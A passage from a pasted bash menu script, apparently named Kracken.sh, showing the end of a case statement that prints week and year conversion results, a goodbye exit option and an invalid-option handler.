  1164.   echo "WEEKS: $E"
  1165.   echo ""
  1166.   echo "YEARS: $F"
  1167.  
  1168.   echo ""
  1169.   echo ""
  1170.   echo "*************************"
  1171.   echo "* Press enter to return *"
  1172.   echo "*************************"
  1173.    
  1174.     read -p "";;
  1175.    
  1176. 15)
  1177.  
  1178.     clear
  1179.    
  1180.   echo "***********"
  1181.   echo "* Goodbye *"
  1182.   echo "***********"
  1183.  
  1184.     sleep 3
  1185.     clear
  1186.     exit;;
  1187.  
  1188. *)
  1189.  
  1190.     clear
  1191.  
  1192.   echo "*******************************************"
  1193.   echo "* Invalid option. Press any key to return *"
  1194.   echo "*******************************************"
  1195.    
  1196.     read -p "";;
  1197.  
  1198.       esac
  1199.    
  1200.       done
  1201.      
  1202. ./Kracken.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement